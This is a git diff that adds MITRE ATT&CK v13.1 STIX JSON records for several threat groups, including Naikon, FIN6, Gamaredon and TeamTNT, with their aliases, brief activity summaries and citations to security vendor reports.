@@ -0,0 +1,58 @@ +{ + "type": "bundle", + "id": "bundle--1350a4ee-203c-45a2-9d87-a7432f2337fb", + "spec_version": "2.0", + "objects": [ + { + "aliases": [ + "Strider", + "ProjectSauron" + ], + "x_mitre_domains": [ + "enterprise-attack" + ], + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "id": "intrusion-set--277d2f87-2ae5-4730-a3aa-50c1fdff9656", + "type": "intrusion-set", + "created": "2017-05-31T21:32:07.541Z", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "external_references": [ + { + "source_name": "mitre-attack", + "url": "https://attack.mitre.org/groups/G0041", + "external_id": "G0041" + }, + { + "source_name": "Strider", + "description": "(Citation: Symantec Strider Blog) (Citation: Kaspersky ProjectSauron Blog)" + }, + { + "source_name": "ProjectSauron", + "description": "ProjectSauron is used to refer both to the threat group also known as G0041 as well as the malware platform also known as S0125. (Citation: Kaspersky ProjectSauron Blog) (Citation: Kaspersky ProjectSauron Full Report)" + }, + { + "source_name": "Symantec Strider Blog", + "description": "Symantec Security Response. (2016, August 7). Strider: Cyberespionage group turns eye of Sauron on targets. Retrieved August 17, 2016.", + "url": "http://www.symantec.com/connect/blogs/strider-cyberespionage-group-turns-eye-sauron-targets" + }, + { + "source_name": "Kaspersky ProjectSauron Blog", + "description": "Kaspersky Lab's Global Research & Analysis Team. (2016, August 8). ProjectSauron: top level cyber-espionage platform covertly extracts encrypted government comms. Retrieved August 17, 2016.", + "url": "https://securelist.com/faq-the-projectsauron-apt/75533/" + }, + { + "source_name": "Kaspersky ProjectSauron Full Report", + "description": "Kaspersky Lab's Global Research & Analysis Team. (2016, August 9). The ProjectSauron APT. 
Retrieved August 17, 2016.", + "url": "https://securelist.com/files/2016/07/The-ProjectSauron-APT_research_KL.pdf" + } + ], + "modified": "2020-06-29T01:43:19.374Z", + "name": "Strider", + "description": "[Strider](https://attack.mitre.org/groups/G0041) is a threat group that has been active since at least 2011 and has targeted victims in Russia, China, Sweden, Belgium, Iran, and Rwanda.(Citation: Symantec Strider Blog)(Citation: Kaspersky ProjectSauron Blog)", + "x_mitre_version": "1.1", + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5" + } + ] +} \ No newline at end of file diff --git a/cti-ATT-CK-v13.1/enterprise-attack/intrusion-set/intrusion-set--28f04ed3-8e91-4805-b1f6-869020517871.json b/cti-ATT-CK-v13.1/enterprise-attack/intrusion-set/intrusion-set--28f04ed3-8e91-4805-b1f6-869020517871.json new file mode 100644 index 0000000000000000000000000000000000000000..287f4d1358f33be2c7057c1319fdddc50707a888 --- /dev/null +++ b/cti-ATT-CK-v13.1/enterprise-attack/intrusion-set/intrusion-set--28f04ed3-8e91-4805-b1f6-869020517871.json 
@@ -0,0 +1,50 @@ +{ + "type": "bundle", + "id": "bundle--0c271b3f-c1ed-462b-b68a-ca77aff04350", + "spec_version": "2.0", + "objects": [ + { + "modified": "2022-10-12T19:17:31.924Z", + "name": "Operation Wocao", + "description": "[Operation Wocao](https://attack.mitre.org/groups/G0116) described activities carried out by a China-based cyber espionage adversary. [Operation Wocao](https://attack.mitre.org/groups/G0116) targeted entities within the government, managed service providers, energy, health care, and technology sectors across several countries, including China, France, Germany, the United Kingdom, and the United States. [Operation Wocao](https://attack.mitre.org/groups/G0116) used similar TTPs and tools to APT20, suggesting a possible overlap.(Citation: FoxIT Wocao December 2019)", + "aliases": [ + "Operation Wocao" + ], + "x_mitre_deprecated": true, + "x_mitre_version": "1.0", + "x_mitre_contributors": [ + "Erik Schamper, @Schamperr, Fox-IT", + "Maarten van Dantzig, @MaartenVDantzig, Fox-IT" + ], + "type": "intrusion-set", + "id": "intrusion-set--28f04ed3-8e91-4805-b1f6-869020517871", + "created": "2020-11-17T20:33:44.273Z", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "revoked": false, + "external_references": [ + { + "source_name": "mitre-attack", + "url": "https://attack.mitre.org/groups/G0116", + "external_id": "G0116" + }, + { + "source_name": "Operation Wocao", + "description": "(Citation: FoxIT Wocao December 2019)" + }, + { + "source_name": "FoxIT Wocao December 2019", + "description": "Dantzig, M. v., Schamper, E. (2019, December 19). Operation Wocao: Shining a light on one of China\u2019s hidden hacking groups. 
Retrieved October 8, 2020.", + "url": "https://www.fox-it.com/media/kadlze5c/201912_report_operation_wocao.pdf" + } + ], + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "x_mitre_domains": [ + "enterprise-attack" + ], + "x_mitre_attack_spec_version": "2.1.0", + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5" + } + ] +} \ No newline at end of file diff --git a/cti-ATT-CK-v13.1/enterprise-attack/intrusion-set/intrusion-set--2a158b0a-7ef8-43cb-9985-bf34d1e12050.json b/cti-ATT-CK-v13.1/enterprise-attack/intrusion-set/intrusion-set--2a158b0a-7ef8-43cb-9985-bf34d1e12050.json new file mode 100644 index 0000000000000000000000000000000000000000..8b384715debfcee37ade84fafb8a23de2a6b44d3 --- /dev/null +++ b/cti-ATT-CK-v13.1/enterprise-attack/intrusion-set/intrusion-set--2a158b0a-7ef8-43cb-9985-bf34d1e12050.json 
@@ -0,0 +1,56 @@ +{ + "type": "bundle", + "id": "bundle--9a80a27b-fc2e-4a81-9985-cf860fa9d9b3", + "spec_version": "2.0", + "objects": [ + { + "aliases": [ + "Naikon" + ], + "x_mitre_domains": [ + "enterprise-attack" + ], + "x_mitre_contributors": [ + "Kyaw Pyiyt Htet, @KyawPyiytHtet" + ], + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "id": "intrusion-set--2a158b0a-7ef8-43cb-9985-bf34d1e12050", + "type": "intrusion-set", + "created": "2017-05-31T21:31:54.232Z", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "external_references": [ + { + "external_id": "G0019", + "url": "https://attack.mitre.org/groups/G0019", + "source_name": "mitre-attack" + }, + { + "source_name": "Naikon", + "description": "(Citation: Baumgartner Naikon 2015)(Citation: CameraShy)(Citation: Baumgartner Golovkin Naikon 2015)" + }, + { + "source_name": "CameraShy", + "description": "ThreatConnect Inc. and Defense Group Inc. (DGI). (2015, September 23). Project CameraShy: Closing the Aperture on China's Unit 78020. Retrieved December 17, 2015.", + "url": "http://cdn2.hubspot.net/hubfs/454298/Project_CAMERASHY_ThreatConnect_Copyright_2015.pdf" + }, + { + "url": "https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2018/03/07205555/TheNaikonAPT-MsnMM1.pdf", + "description": "Baumgartner, K., Golovkin, M.. (2015, May). The MsnMM Campaigns: The Earliest Naikon APT Campaigns. Retrieved April 10, 2019.", + "source_name": "Baumgartner Naikon 2015" + }, + { + "url": "https://securelist.com/the-naikon-apt/69953/", + "description": "Baumgartner, K., Golovkin, M.. (2015, May 14). The Naikon APT. 
Retrieved January 14, 2015.", + "source_name": "Baumgartner Golovkin Naikon 2015" + } + ], + "modified": "2021-08-19T18:23:23.507Z", + "name": "Naikon", + "description": "[Naikon](https://attack.mitre.org/groups/G0019) is assessed to be a state-sponsored cyber espionage group attributed to the Chinese People\u2019s Liberation Army\u2019s (PLA) Chengdu Military Region Second Technical Reconnaissance Bureau (Military Unit Cover Designator 78020).(Citation: CameraShy) Active since at least 2010, [Naikon](https://attack.mitre.org/groups/G0019) has primarily conducted operations against government, military, and civil organizations in Southeast Asia, as well as against international bodies such as the United Nations Development Programme (UNDP) and the Association of Southeast Asian Nations (ASEAN).(Citation: CameraShy)(Citation: Baumgartner Naikon 2015) \n\nWhile [Naikon](https://attack.mitre.org/groups/G0019) shares some characteristics with [APT30](https://attack.mitre.org/groups/G0013), the two groups do not appear to be exact matches.(Citation: Baumgartner Golovkin Naikon 2015)", + "x_mitre_version": "2.0", + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5" + } + ] +} \ No newline at end of file diff --git a/cti-ATT-CK-v13.1/enterprise-attack/intrusion-set/intrusion-set--2a7914cf-dff3-428d-ab0f-1014d1c28aeb.json b/cti-ATT-CK-v13.1/enterprise-attack/intrusion-set/intrusion-set--2a7914cf-dff3-428d-ab0f-1014d1c28aeb.json new file mode 100644 index 0000000000000000000000000000000000000000..043c81ce60566dd4015744ab7cef591df5b5c952 --- /dev/null +++ b/cti-ATT-CK-v13.1/enterprise-attack/intrusion-set/intrusion-set--2a7914cf-dff3-428d-ab0f-1014d1c28aeb.json 
@@ -0,0 +1,86 @@ +{ + "type": "bundle", + "id": "bundle--a92b7b4f-1599-4542-86fe-13b538147f4d", + "spec_version": "2.0", + "objects": [ + { + "modified": "2023-03-22T03:50:17.471Z", + "name": "FIN6", + "description": "[FIN6](https://attack.mitre.org/groups/G0037) is a cyber crime group that has stolen payment card data and sold it for profit on underground marketplaces. This group has aggressively targeted and compromised point of sale (PoS) systems in the hospitality and retail sectors.(Citation: FireEye FIN6 April 2016)(Citation: FireEye FIN6 Apr 2019)", + "aliases": [ + "FIN6", + "Magecart Group 6", + "ITG08", + "Skeleton Spider" + ], + "x_mitre_deprecated": false, + "x_mitre_version": "3.3", + "x_mitre_contributors": [ + "Center for Threat-Informed Defense (CTID)", + "Drew Church, Splunk" + ], + "type": "intrusion-set", + "id": "intrusion-set--2a7914cf-dff3-428d-ab0f-1014d1c28aeb", + "created": "2017-05-31T21:32:06.015Z", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "revoked": false, + "external_references": [ + { + "source_name": "mitre-attack", + "url": "https://attack.mitre.org/groups/G0037", + "external_id": "G0037" + }, + { + "source_name": "Skeleton Spider", + "description": "(Citation: Crowdstrike Global Threat Report Feb 2018)" + }, + { + "source_name": "FIN6", + "description": "(Citation: FireEye FIN6 April 2016)" + }, + { + "source_name": "Magecart Group 6", + "description": "(Citation: Security Intelligence ITG08 April 2020)" + }, + { + "source_name": "ITG08", + "description": "(Citation: Security Intelligence More Eggs Aug 2019)" + }, + { + "source_name": "Crowdstrike Global Threat Report Feb 2018", + "description": "CrowdStrike. (2018, February 26). CrowdStrike 2018 Global Threat Report. Retrieved October 10, 2018.", + "url": "https://crowdstrike.lookbookhq.com/global-threat-report-2018-web/cs-2018-global-threat-report" + }, + { + "source_name": "FireEye FIN6 April 2016", + "description": "FireEye Threat Intelligence. 
(2016, April). Follow the Money: Dissecting the Operations of the Cyber Crime Group FIN6. Retrieved June 1, 2016.", + "url": "https://www2.fireeye.com/rs/848-DID-242/images/rpt-fin6.pdf" + }, + { + "source_name": "FireEye FIN6 Apr 2019", + "description": "McKeague, B. et al. (2019, April 5). Pick-Six: Intercepting a FIN6 Intrusion, an Actor Recently Tied to Ryuk and LockerGoga Ransomware. Retrieved April 17, 2019.", + "url": "https://www.fireeye.com/blog/threat-research/2019/04/pick-six-intercepting-a-fin6-intrusion.html" + }, + { + "source_name": "Security Intelligence ITG08 April 2020", + "description": "Villadsen, O. (2020, April 7). ITG08 (aka FIN6) Partners With TrickBot Gang, Uses Anchor Framework. Retrieved October 8, 2020.", + "url": "https://securityintelligence.com/posts/itg08-aka-fin6-partners-with-trickbot-gang-uses-anchor-framework/" + }, + { + "source_name": "Security Intelligence More Eggs Aug 2019", + "description": "Villadsen, O.. (2019, August 29). More_eggs, Anyone? Threat Actor ITG08 Strikes Again. Retrieved September 16, 2019.", + "url": "https://securityintelligence.com/posts/more_eggs-anyone-threat-actor-itg08-strikes-again/" + } + ], + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "x_mitre_domains": [ + "enterprise-attack", + "ics-attack" + ], + "x_mitre_attack_spec_version": "3.1.0", + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5" + } + ] +} \ No newline at end of file diff --git a/cti-ATT-CK-v13.1/enterprise-attack/intrusion-set/intrusion-set--2e290bfe-93b5-48ce-97d6-edcd6d32b7cf.json b/cti-ATT-CK-v13.1/enterprise-attack/intrusion-set/intrusion-set--2e290bfe-93b5-48ce-97d6-edcd6d32b7cf.json new file mode 100644 index 0000000000000000000000000000000000000000..bd2ed48ebb82aead1476d2d322a3a3ae8eab6168 --- /dev/null +++ b/cti-ATT-CK-v13.1/enterprise-attack/intrusion-set/intrusion-set--2e290bfe-93b5-48ce-97d6-edcd6d32b7cf.json 
@@ -0,0 +1,115 @@ +{ + "type": "bundle", + "id": "bundle--cc7a50d7-2256-44dc-8b5c-52a3e9f08de7", + "spec_version": "2.0", + "objects": [ + { + "modified": "2023-03-22T04:29:39.915Z", + "name": "Gamaredon Group", + "description": "[Gamaredon Group](https://attack.mitre.org/groups/G0047) is a suspected Russian cyber espionage threat group that has targeted military, NGO, judiciary, law enforcement, and non-profit organizations in Ukraine since at least 2013. The name [Gamaredon Group](https://attack.mitre.org/groups/G0047) comes from a misspelling of the word \"Armageddon\", which was detected in the adversary's early campaigns.(Citation: Palo Alto Gamaredon Feb 2017)(Citation: TrendMicro Gamaredon April 2020)(Citation: ESET Gamaredon June 2020)(Citation: Symantec Shuckworm January 2022)(Citation: Microsoft Actinium February 2022)\n\nIn November 2021, the Ukrainian government publicly attributed [Gamaredon Group](https://attack.mitre.org/groups/G0047) to Russia's Federal Security Service (FSB) Center 18.(Citation: Bleepingcomputer Gamardeon FSB November 2021)(Citation: Microsoft Actinium February 2022)", + "aliases": [ + "Gamaredon Group", + "IRON TILDEN", + "Primitive Bear", + "ACTINIUM", + "Armageddon", + "Shuckworm", + "DEV-0157" + ], + "x_mitre_deprecated": false, + "x_mitre_version": "2.1", + "x_mitre_contributors": [ + "ESET", + "Trend Micro Incorporated" + ], + "type": "intrusion-set", + "id": "intrusion-set--2e290bfe-93b5-48ce-97d6-edcd6d32b7cf", + "created": "2017-05-31T21:32:09.849Z", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "revoked": false, + "external_references": [ + { + "source_name": "mitre-attack", + "url": "https://attack.mitre.org/groups/G0047", + "external_id": "G0047" + }, + { + "source_name": "ACTINIUM", + "description": "(Citation: Microsoft Actinium February 2022)" + }, + { + "source_name": "DEV-0157", + "description": "(Citation: Microsoft Actinium February 2022)" + }, + { + "source_name": "Gamaredon Group", + 
"description": "(Citation: Palo Alto Gamaredon Feb 2017)" + }, + { + "source_name": "IRON TILDEN", + "description": "(Citation: Secureworks IRON TILDEN Profile)" + }, + { + "source_name": "Armageddon", + "description": "(Citation: Symantec Shuckworm January 2022)" + }, + { + "source_name": "Shuckworm", + "description": "(Citation: Symantec Shuckworm January 2022)" + }, + { + "source_name": "Primitive Bear", + "description": "(Citation: Unit 42 Gamaredon February 2022)" + }, + { + "source_name": "ESET Gamaredon June 2020", + "description": "Boutin, J. (2020, June 11). Gamaredon group grows its game. Retrieved June 16, 2020.", + "url": "https://www.welivesecurity.com/2020/06/11/gamaredon-group-grows-its-game/" + }, + { + "source_name": "TrendMicro Gamaredon April 2020", + "description": "Kakara, H., Maruyama, E. (2020, April 17). Gamaredon APT Group Use Covid-19 Lure in Campaigns. Retrieved May 19, 2020.", + "url": "https://blog.trendmicro.com/trendlabs-security-intelligence/gamaredon-apt-group-use-covid-19-lure-in-campaigns/" + }, + { + "source_name": "Palo Alto Gamaredon Feb 2017", + "description": "Kasza, A. and Reichel, D. (2017, February 27). The Gamaredon Group Toolset Evolution. Retrieved March 1, 2017.", + "url": "https://researchcenter.paloaltonetworks.com/2017/02/unit-42-title-gamaredon-group-toolset-evolution/" + }, + { + "source_name": "Microsoft Actinium February 2022", + "description": "Microsoft Threat Intelligence Center. (2022, February 4). ACTINIUM targets Ukrainian organizations. Retrieved February 18, 2022.", + "url": "https://www.microsoft.com/security/blog/2022/02/04/actinium-targets-ukrainian-organizations/" + }, + { + "source_name": "Secureworks IRON TILDEN Profile", + "description": "Secureworks CTU. (n.d.). IRON TILDEN. Retrieved February 24, 2022.", + "url": "https://www.secureworks.com/research/threat-profiles/iron-tilden" + }, + { + "source_name": "Symantec Shuckworm January 2022", + "description": "Symantec. (2022, January 31). 
Shuckworm Continues Cyber-Espionage Attacks Against Ukraine. Retrieved February 17, 2022.", + "url": "https://symantec-enterprise-blogs.security.com/blogs/threat-intelligence/shuckworm-gamaredon-espionage-ukraine" + }, + { + "source_name": "Bleepingcomputer Gamardeon FSB November 2021", + "description": "Toulas, B. (2018, November 4). Ukraine links members of Gamaredon hacker group to Russian FSB. Retrieved April 15, 2022.", + "url": "https://www.bleepingcomputer.com/news/security/ukraine-links-members-of-gamaredon-hacker-group-to-russian-fsb/" + }, + { + "source_name": "Unit 42 Gamaredon February 2022", + "description": "Unit 42. (2022, February 3). Russia\u2019s Gamaredon aka Primitive Bear APT Group Actively Targeting Ukraine. Retrieved February 21, 2022.", + "url": "https://unit42.paloaltonetworks.com/gamaredon-primitive-bear-ukraine-update-2021/" + } + ], + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "x_mitre_domains": [ + "enterprise-attack" + ], + "x_mitre_attack_spec_version": "3.1.0", + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5" + } + ] +} \ No newline at end of file diff --git a/cti-ATT-CK-v13.1/enterprise-attack/intrusion-set/intrusion-set--2e5d3a83-fe00-41a5-9b60-237efc84832f.json b/cti-ATT-CK-v13.1/enterprise-attack/intrusion-set/intrusion-set--2e5d3a83-fe00-41a5-9b60-237efc84832f.json new file mode 100644 index 0000000000000000000000000000000000000000..b3495a1ff74eb5ae0d133fa6f0de5bd164086a12 --- /dev/null +++ b/cti-ATT-CK-v13.1/enterprise-attack/intrusion-set/intrusion-set--2e5d3a83-fe00-41a5-9b60-237efc84832f.json 
@@ -0,0 +1,43 @@ +{ + "type": "bundle", + "id": "bundle--6cb112c1-67f3-461d-8389-88e26776c061", + "spec_version": "2.0", + "objects": [ + { + "aliases": [ + "Moafee" + ], + "x_mitre_domains": [ + "enterprise-attack" + ], + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "id": "intrusion-set--2e5d3a83-fe00-41a5-9b60-237efc84832f", + "type": "intrusion-set", + "created": "2017-05-31T21:31:46.025Z", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "external_references": [ + { + "source_name": "mitre-attack", + "url": "https://attack.mitre.org/groups/G0002", + "external_id": "G0002" + }, + { + "source_name": "Moafee", + "description": "(Citation: Haq 2014)" + }, + { + "url": "https://www.fireeye.com/blog/threat-research/2014/09/the-path-to-mass-producing-cyber-attacks.html", + "description": "Haq, T., Moran, N., Scott, M., & Vashisht, S. O. (2014, September 10). The Path to Mass-Producing Cyber Attacks [Blog]. Retrieved November 12, 2014.", + "source_name": "Haq 2014" + } + ], + "modified": "2020-03-30T19:09:42.298Z", + "name": "Moafee", + "description": "[Moafee](https://attack.mitre.org/groups/G0002) is a threat group that appears to operate from the Guandong Province of China. Due to overlapping TTPs, including similar custom tools, Moafee is thought to have a direct or indirect relationship with the threat group [DragonOK](https://attack.mitre.org/groups/G0017). (Citation: Haq 2014)", + "x_mitre_version": "1.1", + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5" + } + ] +} \ No newline at end of file diff --git a/cti-ATT-CK-v13.1/enterprise-attack/intrusion-set/intrusion-set--2fd2be6a-d3a2-4a65-b499-05ea2693abee.json b/cti-ATT-CK-v13.1/enterprise-attack/intrusion-set/intrusion-set--2fd2be6a-d3a2-4a65-b499-05ea2693abee.json new file mode 100644 index 0000000000000000000000000000000000000000..65b12930f213bae1be9dbdeaa65f665f02bff686 --- /dev/null 
+++ b/cti-ATT-CK-v13.1/enterprise-attack/intrusion-set/intrusion-set--2fd2be6a-d3a2-4a65-b499-05ea2693abee.json @@ -0,0 +1,43 @@ +{ + "type": "bundle", + "id": "bundle--abbcfbad-b21a-46da-b467-d1a07f2408f7", + "spec_version": "2.0", + "objects": [ + { + "aliases": [ + "Gallmaker" + ], + "x_mitre_domains": [ + "enterprise-attack" + ], + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "id": "intrusion-set--2fd2be6a-d3a2-4a65-b499-05ea2693abee", + "type": "intrusion-set", + "created": "2019-01-30T14:26:42.897Z", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "external_references": [ + { + "external_id": "G0084", + "source_name": "mitre-attack", + "url": "https://attack.mitre.org/groups/G0084" + }, + { + "source_name": "Gallmaker", + "description": "(Citation: Symantec Gallmaker Oct 2018)" + }, + { + "source_name": "Symantec Gallmaker Oct 2018", + "url": "https://www.symantec.com/blogs/threat-intelligence/gallmaker-attack-group", + "description": "Symantec Security Response. (2018, October 10). Gallmaker: New Attack Group Eschews Malware to Live off the Land. Retrieved November 27, 2018." + } + ], + "modified": "2020-03-30T19:04:47.798Z", + "name": "Gallmaker", + "description": "[Gallmaker](https://attack.mitre.org/groups/G0084) is a cyberespionage group that has targeted victims in the Middle East and has been active since at least December 2017. The group has mainly targeted victims in the defense, military, and government sectors.(Citation: Symantec Gallmaker Oct 2018)", + "x_mitre_version": "1.1", + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5" + } + ] +} \ No newline at end of file 
diff --git a/cti-ATT-CK-v13.1/enterprise-attack/intrusion-set/intrusion-set--32bca8ff-d900-4877-aa65-d70baa041b74.json b/cti-ATT-CK-v13.1/enterprise-attack/intrusion-set/intrusion-set--32bca8ff-d900-4877-aa65-d70baa041b74.json new file mode 100644 index 0000000000000000000000000000000000000000..3bcc0bea7829db8eb9b5ca7e060c2c1f283e6c5a --- /dev/null +++ b/cti-ATT-CK-v13.1/enterprise-attack/intrusion-set/intrusion-set--32bca8ff-d900-4877-aa65-d70baa041b74.json 
@@ -0,0 +1,56 @@ +{ + "type": "bundle", + "id": "bundle--a7d101d3-042a-47be-93a8-1a4102f3571d", + "spec_version": "2.0", + "objects": [ + { + "modified": "2023-03-22T04:50:51.782Z", + "name": "Leafminer", + "description": "[Leafminer](https://attack.mitre.org/groups/G0077) is an Iranian threat group that has targeted government organizations and business entities in the Middle East since at least early 2017. (Citation: Symantec Leafminer July 2018)", + "aliases": [ + "Leafminer", + "Raspite" + ], + "x_mitre_deprecated": false, + "x_mitre_version": "2.4", + "type": "intrusion-set", + "id": "intrusion-set--32bca8ff-d900-4877-aa65-d70baa041b74", + "created": "2018-10-17T00:14:20.652Z", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "revoked": false, + "external_references": [ + { + "source_name": "mitre-attack", + "url": "https://attack.mitre.org/groups/G0077", + "external_id": "G0077" + }, + { + "source_name": "Raspite", + "description": "(Citation: Dragos Raspite Aug 2018)" + }, + { + "source_name": "Leafminer", + "description": "(Citation: Symantec Leafminer July 2018)" + }, + { + "source_name": "Dragos Raspite Aug 2018", + "description": "Dragos, Inc. (2018, August 2). RASPITE. Retrieved November 26, 2018.", + "url": "https://www.dragos.com/blog/20180802Raspite.html" + }, + { + "source_name": "Symantec Leafminer July 2018", + "description": "Symantec Security Response. (2018, July 25). Leafminer: New Espionage Campaigns Targeting Middle Eastern Regions. Retrieved August 28, 2018.", + "url": "https://www.symantec.com/blogs/threat-intelligence/leafminer-espionage-middle-east" + } + ], + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "x_mitre_domains": [ + "enterprise-attack" + ], + "x_mitre_attack_spec_version": "3.1.0", + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5" + } + ] +} \ No newline at end of file 
diff --git a/cti-ATT-CK-v13.1/enterprise-attack/intrusion-set/intrusion-set--35d1b3be-49d4-42f1-aaa6-ef159c880bca.json b/cti-ATT-CK-v13.1/enterprise-attack/intrusion-set/intrusion-set--35d1b3be-49d4-42f1-aaa6-ef159c880bca.json new file mode 100644 index 0000000000000000000000000000000000000000..e640f06e4ac78217865440c2809ed3ed19c2acec --- /dev/null +++ b/cti-ATT-CK-v13.1/enterprise-attack/intrusion-set/intrusion-set--35d1b3be-49d4-42f1-aaa6-ef159c880bca.json 
@@ -0,0 +1,86 @@ +{ + "type": "bundle", + "id": "bundle--22c4f163-97f7-47f4-8241-4a4f6808b6ac", + "spec_version": "2.0", + "objects": [ + { + "modified": "2022-10-19T21:35:03.147Z", + "name": "TeamTNT", + "description": "[TeamTNT](https://attack.mitre.org/groups/G0139) is a threat group that has primarily targeted cloud and containerized environments. The group as been active since at least October 2019 and has mainly focused its efforts on leveraging cloud and container resources to deploy cryptocurrency miners in victim environments.(Citation: Palo Alto Black-T October 2020)(Citation: Lacework TeamTNT May 2021)(Citation: Intezer TeamTNT September 2020)(Citation: Cado Security TeamTNT Worm August 2020)(Citation: Unit 42 Hildegard Malware)(Citation: Trend Micro TeamTNT)(Citation: ATT TeamTNT Chimaera September 2020)(Citation: Aqua TeamTNT August 2020)(Citation: Intezer TeamTNT Explosion September 2021)", + "aliases": [ + "TeamTNT" + ], + "x_mitre_deprecated": false, + "x_mitre_version": "1.2", + "x_mitre_contributors": [ + "Will Thomas, Cyjax", + "Darin Smith, Cisco" + ], + "type": "intrusion-set", + "id": "intrusion-set--35d1b3be-49d4-42f1-aaa6-ef159c880bca", + "created": "2021-10-01T01:57:31.229Z", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "revoked": false, + "external_references": [ + { + "source_name": "mitre-attack", + "url": "https://attack.mitre.org/groups/G0139", + "external_id": "G0139" + }, + { + "source_name": "ATT TeamTNT Chimaera September 2020", + "description": "AT&T Alien Labs. (2021, September 8). TeamTNT with new campaign aka Chimaera. Retrieved September 22, 2021.", + "url": "https://cybersecurity.att.com/blogs/labs-research/teamtnt-with-new-campaign-aka-chimaera" + }, + { + "source_name": "Cado Security TeamTNT Worm August 2020", + "description": "Cado Security. (2020, August 16). Team TNT \u2013 The First Crypto-Mining Worm to Steal AWS Credentials. 
Retrieved September 22, 2021.", + "url": "https://www.cadosecurity.com/team-tnt-the-first-crypto-mining-worm-to-steal-aws-credentials/" + }, + { + "source_name": "Unit 42 Hildegard Malware", + "description": "Chen, J. et al. (2021, February 3). Hildegard: New TeamTNT Cryptojacking Malware Targeting Kubernetes. Retrieved April 5, 2021.", + "url": "https://unit42.paloaltonetworks.com/hildegard-malware-teamtnt/" + }, + { + "source_name": "Trend Micro TeamTNT", + "description": "Fiser, D. Oliveira, A. (n.d.). Tracking the Activities of TeamTNT A Closer Look at a Cloud-Focused Malicious Actor Group. Retrieved September 22, 2021.", + "url": "https://documents.trendmicro.com/assets/white_papers/wp-tracking-the-activities-of-teamTNT.pdf" + }, + { + "source_name": "Intezer TeamTNT September 2020", + "description": "Fishbein, N. (2020, September 8). Attackers Abusing Legitimate Cloud Monitoring Tools to Conduct Cyber Attacks. Retrieved September 22, 2021.", + "url": "https://www.intezer.com/blog/cloud-security/attackers-abusing-legitimate-cloud-monitoring-tools-to-conduct-cyber-attacks/" + }, + { + "source_name": "Intezer TeamTNT Explosion September 2021", + "description": "Intezer. (2021, September 1). TeamTNT Cryptomining Explosion. Retrieved October 15, 2021.", + "url": "https://www.intezer.com/wp-content/uploads/2021/09/TeamTNT-Cryptomining-Explosion.pdf" + }, + { + "source_name": "Aqua TeamTNT August 2020", + "description": "Kol, Roi. Morag, A. (2020, August 25). Deep Analysis of TeamTNT Techniques Using Container Images to Attack. Retrieved September 22, 2021.", + "url": "https://blog.aquasec.com/container-security-tnt-container-attack" + }, + { + "source_name": "Palo Alto Black-T October 2020", + "description": "Quist, N. (2020, October 5). Black-T: New Cryptojacking Variant from TeamTNT. 
Retrieved September 22, 2021.", + "url": "https://unit42.paloaltonetworks.com/black-t-cryptojacking-variant/" + }, + { + "source_name": "Lacework TeamTNT May 2021", + "description": "Stroud, J. (2021, May 25). Taking TeamTNT's Docker Images Offline. Retrieved September 22, 2021.", + "url": "https://www.lacework.com/blog/taking-teamtnt-docker-images-offline/" + } + ], + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "x_mitre_domains": [ + "enterprise-attack" + ], + "x_mitre_attack_spec_version": "2.1.0", + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5" + } + ] +} \ No newline at end of file diff --git a/cti-ATT-CK-v13.1/enterprise-attack/intrusion-set/intrusion-set--3753cc21-2dae-4dfb-8481-d004e74502cc.json b/cti-ATT-CK-v13.1/enterprise-attack/intrusion-set/intrusion-set--3753cc21-2dae-4dfb-8481-d004e74502cc.json new file mode 100644 index 0000000000000000000000000000000000000000..edfef41c1a576f8afbecf464e268fc9f6e7afb3f --- /dev/null +++ b/cti-ATT-CK-v13.1/enterprise-attack/intrusion-set/intrusion-set--3753cc21-2dae-4dfb-8481-d004e74502cc.json 
